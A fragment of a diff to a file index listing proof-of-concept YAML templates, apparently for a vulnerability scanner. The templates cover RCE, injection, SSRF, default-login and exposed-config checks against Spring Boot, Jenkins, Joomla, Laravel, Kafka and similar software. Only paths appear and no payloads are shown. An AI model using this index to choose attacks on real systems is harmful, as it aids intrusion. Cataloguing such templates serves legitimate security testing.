./poc/graphql/graphql-get-method-7836.yaml -./poc/graphql/graphql-get-method.yaml ./poc/graphql/graphql-go-detect.yaml ./poc/graphql/graphql-gqlgen-detect.yaml ./poc/graphql/graphql-graphene-detect.yaml @@ -47869,6 +47847,7 @@ ./poc/graphql/hasura-graphql-psql-exec-7902.yaml ./poc/graphql/hasura-graphql-ssrf-7903.yaml ./poc/graphql/hasura-graphql-ssrf-7904.yaml +./poc/graphql/hasura-graphql-ssrf-7905.yaml ./poc/graphql/hasura-graphql-ssrf-7906.yaml ./poc/graphql/hasura-graphql-ssrf.yaml ./poc/graphql/hidden-graphql-endpoint-discovery.yaml @@ -47940,6 +47919,7 @@ ./poc/header/header-blind-time-sql-injection.yaml ./poc/header/header-command-injection-7917.yaml ./poc/header/header-command-injection-7918.yaml +./poc/header/header-command-injection-7919.yaml ./poc/header/header-command-injection-7920.yaml ./poc/header/header-command-injection.yaml ./poc/header/header-enhancement-8ca1ca4a446ea27e1e50c6dcc62fa72b.yaml @@ -47974,10 +47954,8 @@ ./poc/header/hidden-data-in-headers.yaml ./poc/header/hidden-http-header-injection.yaml ./poc/header/host-header-auth-bypass.yaml -./poc/header/host-header-injection-8000.yaml ./poc/header/host-header-injection-8002.yaml ./poc/header/host-header-injection.yaml -./poc/header/host-header-poisoning.yaml ./poc/header/hostheaderpoisoning.yaml ./poc/header/http-cache-header.yaml ./poc/header/http-cors-header.yaml @@ -47988,7 +47966,6 @@ ./poc/header/http-headers-a66a555d9e5fa4a2bb41c853ef9462e9.yaml ./poc/header/http-headers.yaml ./poc/header/http-missing-security-headers-8058.yaml -./poc/header/http-missing-security-headers.yaml ./poc/header/http-xframe-header.yaml ./poc/header/insert-headers-and-footers-07e3cd9581f59ebebf0ea2afde0b3b69.yaml ./poc/header/insert-headers-and-footers-7d5f28d00d66d203ff5a11666d3be6e5.yaml @@ -47996,11 +47973,14 @@ ./poc/header/insert-headers-and-footers.yaml ./poc/header/jenkins-headers-detect.yaml ./poc/header/jfrog-version-header.yaml +./poc/header/log4j-header.yaml ./poc/header/maxforwards-headers-detect.yaml ./poc/header/missing-hsts-header.yaml ./poc/header/null-auth-header-auth-bypass.yaml ./poc/header/oob-header-based-interaction-9248.yaml ./poc/header/oob-header-based-interaction-9249.yaml +./poc/header/oob-header-based-interaction-9250.yaml +./poc/header/oob-header-based-interaction.yaml ./poc/header/pearl-header-builder-2ad1e0994a7bb85ac431ac6afa84db60.yaml ./poc/header/pearl-header-builder-a51f1388039630606710e61f15390639.yaml ./poc/header/pearl-header-builder.yaml @@ -48009,7 +47989,6 @@ ./poc/header/responsive-header-image-slider.yaml ./poc/header/splash-header-ae1af7b8de10cb8ae21a4838e673d47b.yaml ./poc/header/splash-header.yaml -./poc/header/sqli_header-10504.yaml ./poc/header/sqli_header.yaml ./poc/header/sqliheader.yaml ./poc/header/sticky-header-effects-for-elementor.yaml @@ -48043,7 +48022,6 @@ ./poc/http/apache-httpd-cve-2021-40438-ssrf.yml ./poc/http/apache-httpd-cve-2021-41773-path-traversal.yml ./poc/http/apache-httpd-cve-2021-41773-rce.yml -./poc/http/apache-httpd-rce-362.yaml ./poc/http/apache-httpd-rce-363.yaml ./poc/http/apache-httpd-rce.yaml ./poc/http/axtls-embad-httpd.yaml @@ -48051,11 +48029,9 @@ ./poc/http/basic_http.yaml ./poc/http/cl-http.yaml ./poc/http/cl-te-http-request-smuggling.yaml -./poc/http/cl-te-http-smuggling.yaml ./poc/http/crystal-live-http-server-lfi.yaml ./poc/http/default-ibm-http-server-6856.yaml ./poc/http/default-ibm-http-server.yaml -./poc/http/default-lighttpd-page-6866.yaml ./poc/http/default-lighttpd-page-6867.yaml ./poc/http/detect-dns-over-https-6969.yaml ./poc/http/detect-dns-over-https.yaml @@ -48083,7 +48059,6 @@ ./poc/http/http-https-remover-7c0d4499231fc232e325bb27484b40b7.yaml ./poc/http/http-https-remover.yaml ./poc/http/http-missing-security-headers-8058.yaml -./poc/http/http-missing-security-headers.yaml ./poc/http/http-multiple-matcher-condition.yaml ./poc/http/http-multiple-matcher.yaml ./poc/http/http-paths.yaml @@ -48091,22 +48066,21 @@ ./poc/http/http-trace.yaml ./poc/http/http-username-password.yaml ./poc/http/http-value-share-template-1.yaml +./poc/http/http-value-share-template-2.yaml ./poc/http/http-verb-tampering.yaml ./poc/http/http-xframe-header.yaml ./poc/http/httpbin-detection.yaml ./poc/http/httpbin-detection.yml ./poc/http/httpbin-open-redirect-8048.yaml ./poc/http/httpbin-open-redirect-8049.yaml -./poc/http/httpbin-open-redirect.yaml ./poc/http/httpbin-open-redirect.yml ./poc/http/httpbin-panel-8050.yaml -./poc/http/httpbin-panel-8051.yaml ./poc/http/httpbin-panel.yaml ./poc/http/httpbin-xss-8052.yaml ./poc/http/httpbin-xss-8053.yaml ./poc/http/httpbin-xss.yml ./poc/http/httpd-config-8054.yaml -./poc/http/httpd-config.yaml +./poc/http/httpd-config-8055.yaml ./poc/http/httpfs.yaml ./poc/http/httponly-cookie-detect.yaml ./poc/http/https-to-http-redirect.yaml @@ -48116,7 +48090,6 @@ ./poc/http/ibm-http-server-8095.yaml ./poc/http/ibm-http-server-8096.yaml ./poc/http/ibm-http-server-8097.yaml -./poc/http/ibm-http-server.yaml ./poc/http/iis-enum-httpapi.yaml ./poc/http/knopflerfish-http-server.yaml ./poc/http/lighttpd-default-8627.yaml @@ -48135,6 +48108,7 @@ ./poc/http/oracle-http-server-12c-9381.yaml ./poc/http/oracle-http-server-12c-9382.yaml ./poc/http/oracle-http-server-12c-9383.yaml +./poc/http/oracle-http-server-12c-9384.yaml ./poc/http/oracle-http-server-12c.yaml ./poc/http/oracle-httpserver12c.yaml ./poc/http/rmihttpserver.yaml @@ -48161,8 +48135,8 @@ ./poc/ibm/IBM-Signup-Exposure.yaml ./poc/ibm/default-ibm-http-server-6856.yaml ./poc/ibm/default-ibm-http-server.yaml +./poc/ibm/ibm-advanced-system-management-8088.yaml ./poc/ibm/ibm-advanced-system-management-8089.yaml -./poc/ibm/ibm-advanced-system-management-8090.yaml ./poc/ibm/ibm-advanced-system-management-8091.yaml ./poc/ibm/ibm-advanced-system-management.yaml ./poc/ibm/ibm-app-connect-login.yaml @@ -48193,7 +48167,6 @@ ./poc/ibm/ibm-http-server-8095.yaml ./poc/ibm/ibm-http-server-8096.yaml ./poc/ibm/ibm-http-server-8097.yaml -./poc/ibm/ibm-http-server.yaml ./poc/ibm/ibm-imm.yaml ./poc/ibm/ibm-infoprint-directory-traversal-8098.yaml ./poc/ibm/ibm-infoprint-directory-traversal-8099.yaml @@ -48219,8 +48192,8 @@ ./poc/ibm/ibm-mqseries.yaml ./poc/ibm/ibm-note-login-1.yaml ./poc/ibm/ibm-note-login-2.yaml -./poc/ibm/ibm-note-login-8110.yaml ./poc/ibm/ibm-note-login-8111.yaml +./poc/ibm/ibm-note-login-8112.yaml ./poc/ibm/ibm-note-login.yaml ./poc/ibm/ibm-odm-detect.yaml ./poc/ibm/ibm-odm-panel.yaml @@ -48230,7 +48203,6 @@ ./poc/ibm/ibm-security-access-manager.yaml ./poc/ibm/ibm-service-assistant-8116.yaml ./poc/ibm/ibm-service-assistant-8117.yaml -./poc/ibm/ibm-service-assistant-8118.yaml ./poc/ibm/ibm-service-assistant.yaml ./poc/ibm/ibm-signup-exposure-8119.yaml ./poc/ibm/ibm-signup-exposure-8120.yaml @@ -48276,8 +48248,9 @@ ./poc/injection/beescms_v3-login-sql-injection.yaml ./poc/injection/biometric-data-injection-registration.yaml ./poc/injection/biometric-data-injection.yaml -./poc/injection/buffalo-config-injection-798.yaml ./poc/injection/buffalo-config-injection-799.yaml +./poc/injection/buffalo-config-injection-800.yaml +./poc/injection/buffalo-config-injection-801.yaml ./poc/injection/buffalo-config-injection.yaml ./poc/injection/chanjet-crm-get-usedspace-sql-injection.yaml ./poc/injection/cmseasy-crossall-act-php-sql-injection.yaml @@ -48290,6 +48263,7 @@ ./poc/injection/crlf-injection-1.yaml ./poc/injection/crlf-injection-1260.yaml ./poc/injection/crlf-injection-1261.yaml +./poc/injection/crlf-injection-1262.yaml ./poc/injection/crlf-injection-1263.yaml ./poc/injection/crlf-injection-1264.yaml ./poc/injection/crlf-injection-1265.yaml @@ -48316,7 +48290,9 @@ ./poc/injection/drupal_module-social-sql-injection.yaml ./poc/injection/duomicms-sql-injection-7122.yaml ./poc/injection/duomicms-sql-injection-7123.yaml +./poc/injection/duomicms-sql-injection-7124.yaml ./poc/injection/duomicms-sql-injection-7125.yaml +./poc/injection/duomicms-sql-injection.yaml ./poc/injection/error-based-get-sql-injection.yaml ./poc/injection/error-based-post-sql-injection.yaml ./poc/injection/error-based-sql-injection-7249.yaml @@ -48328,17 +48304,18 @@ ./poc/injection/fuzzing-xss-get-params-html-injection.yaml ./poc/injection/fuzzing-xss-get-params-javascript-context-injection.yaml ./poc/injection/fuzzing-xss-get-params-javascript-schema-url-injection.yaml +./poc/injection/glpi-9.3.3-sql-injection.yaml ./poc/injection/header-blind-sql-injection.yaml ./poc/injection/header-blind-time-sql-injection.yaml ./poc/injection/header-command-injection-7917.yaml ./poc/injection/header-command-injection-7918.yaml +./poc/injection/header-command-injection-7919.yaml ./poc/injection/header-command-injection-7920.yaml ./poc/injection/header-command-injection.yaml ./poc/injection/header-injection.yaml ./poc/injection/hidden-command-injection.yaml ./poc/injection/hidden-http-header-injection.yaml ./poc/injection/hidden-ldap-injection.yaml -./poc/injection/host-header-injection-8000.yaml ./poc/injection/host-header-injection-8002.yaml ./poc/injection/host-header-injection.yaml ./poc/injection/injection-guard-4875992ccc89ab6c03d9298f0ea07338.yaml @@ -48480,6 +48457,7 @@ ./poc/java/default-glassfish-server-page-6854.yaml ./poc/java/default-glassfish-server-page-6855.yaml ./poc/java/default-glassfish-server-page.yaml +./poc/java/default-jetty-page-6862.yaml ./poc/java/default-jetty-page-6863.yaml ./poc/java/default-jetty-page-6864.yaml ./poc/java/default-jetty-page-6865.yaml @@ -48489,12 +48467,13 @@ ./poc/java/e-cology-springframework-directory-traversal.yaml ./poc/java/ecology-javabeanshell-rce.yaml ./poc/java/ecology-springframework-directory-traversal-7174.yaml -./poc/java/ecology-springframework-directory-traversal-7175.yaml +./poc/java/ecology-springframework-directory-traversal.yaml ./poc/java/ecology-springframework-directory-traversal.yml ./poc/java/ecology-springframework-directoryTraversal.yaml ./poc/java/exposed-alps-spring-1.yaml ./poc/java/exposed-alps-spring-2.yaml ./poc/java/exposed-alps-spring-3.yaml +./poc/java/exposed-alps-spring-7283.yaml ./poc/java/exposed-alps-spring-7284.yaml ./poc/java/exposed-alps-spring-7285.yaml ./poc/java/exposed-alps-spring.yaml @@ -48521,6 +48500,7 @@ ./poc/java/java-melody-xss-8225.yaml ./poc/java/java-melody-xss-8226.yaml ./poc/java/java-melody-xss.yaml +./poc/java/java-rmi-detect-8227.yaml ./poc/java/java-rmi-detect-8228.yaml ./poc/java/java-rmi-detect.yaml ./poc/java/javamelody-detect.yaml @@ -48537,7 +48517,7 @@ ./poc/java/jboss-as.yaml ./poc/java/jboss-cve-2010-1871.yml ./poc/java/jboss-default-password.yaml -./poc/java/jboss-detect.yaml +./poc/java/jboss-detect-8237.yaml ./poc/java/jboss-eap.yaml ./poc/java/jboss-jbpm-admin.yaml ./poc/java/jboss-juddi.yaml @@ -48556,17 +48536,16 @@ ./poc/java/jetty-information-disclosure.yaml ./poc/java/jetty-showcontexts-enable-8295.yaml ./poc/java/jetty-showcontexts-enable-8296.yaml -./poc/java/jetty-showcontexts-enable-8297.yaml ./poc/java/jetty-showcontexts-enable.yaml ./poc/java/jetty-workflow.yaml ./poc/java/jetty.yaml -./poc/java/jinfornet-jreport-lfi-8308.yaml +./poc/java/jinfornet-jreport-lfi-8307.yaml ./poc/java/jinfornet-jreport-lfi-8309.yaml ./poc/java/jinfornet-jreport-lfi-8310.yaml ./poc/java/jinfornet-jreport-lfi.yaml ./poc/java/jolokia-tomcat-creds-leak.yaml ./poc/java/jsf-detection-8396.yaml -./poc/java/jsf-detection-8397.yaml +./poc/java/jsf-detection-8398.yaml ./poc/java/jsf-detection.yaml ./poc/java/jsf.yaml ./poc/java/jsp-source-code-vulnerabilities.yaml @@ -48592,7 +48571,6 @@ ./poc/java/public-tomcat-instance.yaml ./poc/java/public-tomcat-manager-1.yaml ./poc/java/public-tomcat-manager-2.yaml -./poc/java/public-tomcat-manager-9708.yaml ./poc/java/public-tomcat-manager-9709.yaml ./poc/java/public-tomcat-manager-9710.yaml ./poc/java/public-tomcat-manager-9711.yaml @@ -48603,7 +48581,6 @@ ./poc/java/shiro-124-rememberme.yaml ./poc/java/shiro-deserialization-detection.yaml ./poc/java/shiro-detect-10195.yaml -./poc/java/shiro-detect-10196.yaml ./poc/java/shiro-detect-10197.yaml ./poc/java/spring-boot-admin.yaml ./poc/java/spring-cloud-cve-2020-5405.yml @@ -48613,8 +48590,9 @@ ./poc/java/spring-cve-2016-4977.yaml ./poc/java/spring-cve-2016-4977.yml ./poc/java/spring-eureka.yaml -./poc/java/spring-framework-exceptions-10493.yaml +./poc/java/spring-framework-exceptions.yaml ./poc/java/spring-framework.yaml +./poc/java/springForShell-CVE-2022-22963.yaml ./poc/java/springForShell-CVE-2022-22965.yaml ./poc/java/spring_cloud_gateway_CVE_2022_22947.yaml ./poc/java/spring_cloud_gateway_cve_2022_22947.yaml @@ -48622,20 +48600,18 @@ ./poc/java/springboot-actuator-1.yaml ./poc/java/springboot-actuator-10433.yaml ./poc/java/springboot-actuator-10434.yaml -./poc/java/springboot-actuator-10435.yaml ./poc/java/springboot-actuator-2.yaml ./poc/java/springboot-actuator-unauth.yaml ./poc/java/springboot-actuators-jolokia-xxe-1.yaml ./poc/java/springboot-actuators-jolokia-xxe-10428.yaml ./poc/java/springboot-actuators-jolokia-xxe-10429.yaml -./poc/java/springboot-actuators-jolokia-xxe-10431.yaml +./poc/java/springboot-actuators-jolokia-xxe-10430.yaml ./poc/java/springboot-actuators-jolokia-xxe-10432.yaml ./poc/java/springboot-actuators-jolokia-xxe-2.yaml ./poc/java/springboot-actuators-jolokia-xxe.yaml ./poc/java/springboot-autoconfig-1.yaml ./poc/java/springboot-autoconfig-10437.yaml ./poc/java/springboot-autoconfig-2.yaml -./poc/java/springboot-autoconfig.yaml ./poc/java/springboot-beans-1.yaml ./poc/java/springboot-beans-10439.yaml ./poc/java/springboot-beans-10440.yaml @@ -48643,6 +48619,7 @@ ./poc/java/springboot-beans-2.yaml ./poc/java/springboot-conditions.yaml ./poc/java/springboot-configprops-1.yaml +./poc/java/springboot-configprops-10442.yaml ./poc/java/springboot-configprops-10443.yaml ./poc/java/springboot-configprops-10444.yaml ./poc/java/springboot-configprops-10445.yaml @@ -48655,6 +48632,7 @@ ./poc/java/springboot-env-1.yaml ./poc/java/springboot-env-10448.yaml ./poc/java/springboot-env-10449.yaml +./poc/java/springboot-env-10450.yaml ./poc/java/springboot-env-10451.yaml ./poc/java/springboot-env-2.yaml ./poc/java/springboot-env-unauth.yaml @@ -48666,16 +48644,15 @@ ./poc/java/springboot-h2-db-rce-10454.yaml ./poc/java/springboot-h2-db-rce-10455.yaml ./poc/java/springboot-h2-db-rce-10456.yaml -./poc/java/springboot-h2-db-rce-10457.yaml ./poc/java/springboot-h2-db-rce-10458.yaml +./poc/java/springboot-h2-db-rce.yaml ./poc/java/springboot-health-1.yaml +./poc/java/springboot-health-10459.yaml ./poc/java/springboot-health-10460.yaml ./poc/java/springboot-health-2.yaml -./poc/java/springboot-health.yaml ./poc/java/springboot-heapdump-1.yaml ./poc/java/springboot-heapdump-10461.yaml ./poc/java/springboot-heapdump-10462.yaml -./poc/java/springboot-heapdump-10463.yaml ./poc/java/springboot-heapdump-10464.yaml ./poc/java/springboot-heapdump-10465.yaml ./poc/java/springboot-heapdump-2.yaml @@ -48687,6 +48664,7 @@ ./poc/java/springboot-httptrace-10469.yaml ./poc/java/springboot-httptrace-2.yaml ./poc/java/springboot-info-10470.yaml +./poc/java/springboot-info.yaml ./poc/java/springboot-jolokia.yaml ./poc/java/springboot-log4j-rce-10472.yaml ./poc/java/springboot-log4j-rce-10473.yaml @@ -48694,13 +48672,13 @@ ./poc/java/springboot-logfile.yaml ./poc/java/springboot-loggers-1.yaml ./poc/java/springboot-loggers-10475.yaml -./poc/java/springboot-loggers-10476.yaml +./poc/java/springboot-loggers-10477.yaml ./poc/java/springboot-loggers-2.yaml ./poc/java/springboot-loggers.yaml ./poc/java/springboot-mappings-1.yaml +./poc/java/springboot-mappings-10478.yaml ./poc/java/springboot-mappings-10479.yaml ./poc/java/springboot-mappings-10480.yaml -./poc/java/springboot-mappings-10481.yaml ./poc/java/springboot-mappings-2.yaml ./poc/java/springboot-mappings.yaml ./poc/java/springboot-metrics-1.yaml @@ -48711,14 +48689,12 @@ ./poc/java/springboot-threaddump-1.yaml ./poc/java/springboot-threaddump-10484.yaml ./poc/java/springboot-threaddump-10485.yaml -./poc/java/springboot-threaddump-10486.yaml ./poc/java/springboot-threaddump-10487.yaml ./poc/java/springboot-threaddump-2.yaml ./poc/java/springboot-trace-10488.yaml ./poc/java/springboot-trace-10489.yaml ./poc/java/springboot-trace-10491.yaml ./poc/java/springboot-trace-10492.yaml -./poc/java/springboot-trace.yaml ./poc/java/springboot-whitelabel.yaml ./poc/java/springboot-workflow.yaml ./poc/java/springboot2.x_eureka_rce.yaml @@ -48733,7 +48709,7 @@ ./poc/java/struts-debug-mode-10560.yaml ./poc/java/struts-debug-mode.yaml ./poc/java/struts-problem-report-10562.yaml -./poc/java/struts-problem-report-10563.yaml +./poc/java/struts-problem-report-10564.yaml ./poc/java/struts-problem-report.yaml ./poc/java/struts2_001.yaml ./poc/java/sun-glassfish.yaml @@ -48748,6 +48724,7 @@ ./poc/java/tomcat-default-login-10789.yaml ./poc/java/tomcat-default-login-10790.yaml ./poc/java/tomcat-default-login-10791.yaml +./poc/java/tomcat-default-login.yaml ./poc/java/tomcat-default-manager.yaml ./poc/java/tomcat-detect-10792.yaml ./poc/java/tomcat-detect-10793.yaml @@ -48785,7 +48762,6 @@ ./poc/java/tomcat-pathnormalization-10799.yaml ./poc/java/tomcat-pathnormalization-10800.yaml ./poc/java/tomcat-pathnormalization-2.yaml -./poc/java/tomcat-pathnormalization.yaml ./poc/java/tomcat-scripts-1.yaml ./poc/java/tomcat-scripts-10801.yaml ./poc/java/tomcat-scripts-10802.yaml @@ -48832,11 +48808,10 @@ ./poc/java/weblogic-ssrf.yaml ./poc/java/weblogic-ssrf.yml ./poc/java/weblogic-t3-detect-11151.yaml -./poc/java/weblogic-t3-detect-11152.yaml +./poc/java/weblogic-t3-detect-11153.yaml ./poc/java/weblogic-t3-detect.yaml ./poc/java/weblogic-t3-search.yaml ./poc/java/weblogic-uddiexplorer.yaml -./poc/java/weblogic-weak-login-11154.yaml ./poc/java/weblogic-weak-login-11155.yaml ./poc/java/weblogic-weak-login-11156.yaml ./poc/java/weblogic-workflow-11157.yaml @@ -48844,12 +48819,12 @@ ./poc/java/websphere-portal-preauth-ssrf.yaml ./poc/java/websphere-version-detect.yaml ./poc/java/webview-addjavascript-interface-11175.yaml -./poc/java/webview-addjavascript-interface-11177.yaml +./poc/java/webview-addjavascript-interface-11176.yaml ./poc/java/webview-addjavascript-interface.yaml ./poc/java/webview-javascript-11178.yaml ./poc/java/webview-javascript.yaml +./poc/java/wildfly-panel-11209.yaml ./poc/java/wildfly-panel-11210.yaml -./poc/java/wildfly-panel-11211.yaml ./poc/java/wildfly-panel.yaml ./poc/java/wildfly-server.yaml ./poc/java/wpdbspringclean-ec00604b0e8ff72061ba569674a03777.yaml @@ -48903,8 +48878,8 @@ ./poc/javascript/auth-json.yaml ./poc/javascript/azuredeploy-json.yaml ./poc/javascript/bower-json-768.yaml -./poc/javascript/bower-json-769.yaml ./poc/javascript/bower-json-770.yaml +./poc/javascript/bower-json.yaml ./poc/javascript/composer-auth-json.yaml ./poc/javascript/config-js.yaml ./poc/javascript/credentials-json.yaml @@ -48951,19 +48926,21 @@ ./poc/javascript/fastjson-1-2-24-rce-1.yaml ./poc/javascript/fastjson-1-2-24-rce-2.yaml ./poc/javascript/fastjson-1-2-24-rce-7400.yaml -./poc/javascript/fastjson-1-2-24-rce.yaml ./poc/javascript/fastjson-1-2-41-rce-7401.yaml ./poc/javascript/fastjson-1-2-41-rce-7403.yaml ./poc/javascript/fastjson-1-2-41-rce-7404.yaml +./poc/javascript/fastjson-1-2-41-rce.yaml ./poc/javascript/fastjson-1-2-42-rce-7405.yaml ./poc/javascript/fastjson-1-2-42-rce-7407.yaml -./poc/javascript/fastjson-1-2-42-rce.yaml +./poc/javascript/fastjson-1-2-42-rce-7408.yaml ./poc/javascript/fastjson-1-2-43-rce-7409.yaml ./poc/javascript/fastjson-1-2-43-rce-7411.yaml +./poc/javascript/fastjson-1-2-43-rce-7412.yaml ./poc/javascript/fastjson-1-2-47-rce-7413.yaml ./poc/javascript/fastjson-1-2-47-rce-7415.yaml ./poc/javascript/fastjson-1-2-47-rce-7416.yaml ./poc/javascript/fastjson-1-2-62-rce-7417.yaml +./poc/javascript/fastjson-1-2-62-rce-7419.yaml ./poc/javascript/fastjson-1-2-62-rce-7420.yaml ./poc/javascript/fastjson-1-2-67-rce-7421.yaml ./poc/javascript/fastjson-1-2-67-rce-7423.yaml @@ -49093,10 +49070,9 @@ ./poc/javascript/jsbe.yaml ./poc/javascript/jsconfig-json.yaml ./poc/javascript/jsf-detection-8396.yaml -./poc/javascript/jsf-detection-8397.yaml +./poc/javascript/jsf-detection-8398.yaml ./poc/javascript/jsf-detection.yaml ./poc/javascript/jsf.yaml -./poc/javascript/jsherp-boot-panel.yaml ./poc/javascript/jsmol2wp-6fc39d92daef6aed5760a4b5f8458d00.yaml ./poc/javascript/jsmol2wp-d5be42322ff31dc7bf613195f697a548.yaml ./poc/javascript/jsmol2wp.yaml @@ -49124,7 +49100,7 @@ ./poc/javascript/jsyhit-system.yaml ./poc/javascript/jwks-json.yaml ./poc/javascript/keycloak-json-8471.yaml -./poc/javascript/keycloak-json-8472.yaml +./poc/javascript/keycloak-json-8473.yaml ./poc/javascript/keycloak-json-8474.yaml ./poc/javascript/keys-js.yaml ./poc/javascript/knight-lab-timelinejs-0f42e86470e92d725c0f62d2c358c29e.yaml @@ -49152,9 +49128,9 @@ ./poc/javascript/ojs-unauthenticated-open-redirect.yaml ./poc/javascript/package-json-1.yaml ./poc/javascript/package-json-2.yaml +./poc/javascript/package-json-9421.yaml ./poc/javascript/package-json-9422.yaml ./poc/javascript/package-json-9423.yaml -./poc/javascript/package-json.yaml ./poc/javascript/pdfjs-viewer-shortcode-901f07b1c8adb20b4d89c03c0e4b0f6e.yaml ./poc/javascript/pdfjs-viewer-shortcode-9f8b34f5ac9a5f3aa8eca1410ed341dd.yaml ./poc/javascript/pdfjs-viewer-shortcode-a8f0b32d7cfb6af435cac07ab61c5de1.yaml @@ -49191,7 +49167,7 @@ ./poc/javascript/wanhu-ezoffice-smartupload-jsp-fileupload.yaml ./poc/javascript/wanhu-ezoffice-upload-jsp-fileupload.yaml ./poc/javascript/webview-addjavascript-interface-11175.yaml -./poc/javascript/webview-addjavascript-interface-11177.yaml +./poc/javascript/webview-addjavascript-interface-11176.yaml ./poc/javascript/webview-addjavascript-interface.yaml ./poc/javascript/webview-javascript-11178.yaml ./poc/javascript/webview-javascript.yaml @@ -49236,26 +49212,27 @@ ./poc/jenkins/jenkins-cve-2018-1000861-rce.yml ./poc/jenkins/jenkins-default-8270.yaml ./poc/jenkins/jenkins-default-8271.yaml +./poc/jenkins/jenkins-default-8272.yaml ./poc/jenkins/jenkins-default-8273.yaml ./poc/jenkins/jenkins-default-login.yaml ./poc/jenkins/jenkins-default-pwd.yaml -./poc/jenkins/jenkins-default.yaml ./poc/jenkins/jenkins-detect-8274.yaml -./poc/jenkins/jenkins-detect-8275.yaml +./poc/jenkins/jenkins-detect-8276.yaml ./poc/jenkins/jenkins-detect.yaml ./poc/jenkins/jenkins-exposed.yaml ./poc/jenkins/jenkins-headers-detect.yaml ./poc/jenkins/jenkins-home-dir-exposure.yaml -./poc/jenkins/jenkins-login-8277.yaml ./poc/jenkins/jenkins-login-8278.yaml ./poc/jenkins/jenkins-login-8279.yaml +./poc/jenkins/jenkins-login-8280.yaml ./poc/jenkins/jenkins-login-detection.yaml ./poc/jenkins/jenkins-login.yaml ./poc/jenkins/jenkins-rce.yaml ./poc/jenkins/jenkins-script-8281.yaml ./poc/jenkins/jenkins-script-8282.yaml ./poc/jenkins/jenkins-script-8283.yaml -./poc/jenkins/jenkins-script-8284.yaml +./poc/jenkins/jenkins-script.yaml +./poc/jenkins/jenkins-stack-trace-8285.yaml ./poc/jenkins/jenkins-stack-trace-8286.yaml ./poc/jenkins/jenkins-stack-trace-8287.yaml ./poc/jenkins/jenkins-stack-trace-8288.yaml @@ -49301,9 +49278,9 @@ ./poc/joomla/freejoomlas.yaml ./poc/joomla/joomla-cnvd-2019-34135-rce.yml ./poc/joomla/joomla-com-fabrik-lfi-8370.yaml -./poc/joomla/joomla-com-fabrik-lfi-8371.yaml ./poc/joomla/joomla-com-fabrik-lfi-8372.yaml ./poc/joomla/joomla-com-fabrik-lfi-8373.yaml +./poc/joomla/joomla-com-fabrik-lfi.yaml ./poc/joomla/joomla-component-vreview-sql.yaml ./poc/joomla/joomla-component-vreview-sql.yml ./poc/joomla/joomla-config-dist-file.yaml @@ -49317,7 +49294,7 @@ ./poc/joomla/joomla-ext-zhbaidumap-cve-2018-6605-sqli.yml ./poc/joomla/joomla-file-listing-8378.yaml ./poc/joomla/joomla-file-listing-8379.yaml -./poc/joomla/joomla-file-listing.yaml +./poc/joomla/joomla-file-listing-8380.yaml ./poc/joomla/joomla-host-injection.yaml ./poc/joomla/joomla-htaccess-8381.yaml ./poc/joomla/joomla-htaccess-8382.yaml @@ -49331,8 +49308,8 @@ ./poc/joomla/joomla-manifest-file-8387.yaml ./poc/joomla/joomla-manifest-file-8388.yaml ./poc/joomla/joomla-manifest-file.yaml +./poc/joomla/joomla-panel-8389.yaml ./poc/joomla/joomla-panel-8390.yaml -./poc/joomla/joomla-panel-8391.yaml ./poc/joomla/joomla-panel-8392.yaml ./poc/joomla/joomla-panel.yaml ./poc/joomla/joomla-sensitive-config.yaml @@ -49351,13 +49328,14 @@ ./poc/joomla/joomla-version.yaml ./poc/joomla/joomla-workflow-8393.yaml ./poc/joomla/joomla-workflow-8394.yaml -./poc/joomla/joomla-workflow.yaml ./poc/joomla/joomla.yaml ./poc/joomla/rusty-joomla-9955.yaml +./poc/joomla/rusty-joomla.yaml ./poc/kafka/apache-druid-kafka-connect-rce.yaml ./poc/kafka/kafka-center-default-login-8415.yaml ./poc/kafka/kafka-center-default-login-8416.yaml ./poc/kafka/kafka-center-default-login-8417.yaml +./poc/kafka/kafka-center-default-login.yaml ./poc/kafka/kafka-center-default-password.yaml ./poc/kafka/kafka-center-login-8419.yaml ./poc/kafka/kafka-center-login.yaml @@ -49366,7 +49344,7 @@ ./poc/kafka/kafka-connect-ui-8422.yaml ./poc/kafka/kafka-connect-ui-8423.yaml ./poc/kafka/kafka-connect-ui.yaml -./poc/kafka/kafka-consumer-monitor-8425.yaml +./poc/kafka/kafka-consumer-monitor-8424.yaml ./poc/kafka/kafka-consumer-monitor.yaml ./poc/kafka/kafka-cruise-control-8426.yaml ./poc/kafka/kafka-cruise-control-8427.yaml @@ -49374,9 +49352,9 @@ ./poc/kafka/kafka-manager-unauth.yml ./poc/kafka/kafka-manager.yaml ./poc/kafka/kafka-misconfig.yaml +./poc/kafka/kafka-monitoring-8428.yaml ./poc/kafka/kafka-monitoring-8429.yaml ./poc/kafka/kafka-monitoring-8430.yaml -./poc/kafka/kafka-monitoring-8431.yaml ./poc/kafka/kafka-monitoring.yaml ./poc/kafka/kafka-topics-list.yaml ./poc/kafka/kafka-topics-ui-8432.yaml @@ -49409,10 +49387,8 @@ ./poc/laravel/laravel-cve-2021-3129.yml ./poc/laravel/laravel-debug-enabled-8574.yaml ./poc/laravel/laravel-debug-enabled-8575.yaml -./poc/laravel/laravel-debug-enabled-8576.yaml ./poc/laravel/laravel-debug-enabled-8577.yaml ./poc/laravel/laravel-debug-enabled-8578.yaml -./poc/laravel/laravel-debug-enabled.yaml ./poc/laravel/laravel-debug-error-8579.yaml ./poc/laravel/laravel-debug-error.yaml ./poc/laravel/laravel-debug-info-leak.yaml @@ -49422,6 +49398,7 @@ ./poc/laravel/laravel-detect.yaml ./poc/laravel/laravel-env-8580.yaml ./poc/laravel/laravel-env-8581.yaml +./poc/laravel/laravel-env-8582.yaml ./poc/laravel/laravel-env-8583.yaml ./poc/laravel/laravel-env-8584.yaml ./poc/laravel/laravel-env-8585.yaml @@ -49436,11 +49413,11 @@ ./poc/laravel/laravel-framework.yaml ./poc/laravel/laravel-ignition-xss-8592.yaml ./poc/laravel/laravel-ignition-xss-8593.yaml +./poc/laravel/laravel-ignition-xss.yaml ./poc/laravel/laravel-improper-webdir.yaml ./poc/laravel/laravel-improper-webdir.yml ./poc/laravel/laravel-log-file-8594.yaml ./poc/laravel/laravel-log-file-8595.yaml -./poc/laravel/laravel-log-file-8596.yaml ./poc/laravel/laravel-log-file-8597.yaml ./poc/laravel/laravel-log-file-8598.yaml ./poc/laravel/laravel-telescope-8599.yaml @@ -49484,6 +49461,7 @@ ./poc/ldap/ldap-wp-login-integration-with-active-directory.yaml ./poc/ldap/ldap-wp-login-xss.yaml ./poc/ldap/phpldap-admin.yaml +./poc/ldap/phpldapadmin-panel.yaml ./poc/ldap/phpldapadmin-xss.yaml ./poc/ldap/phpldapadmin.yaml 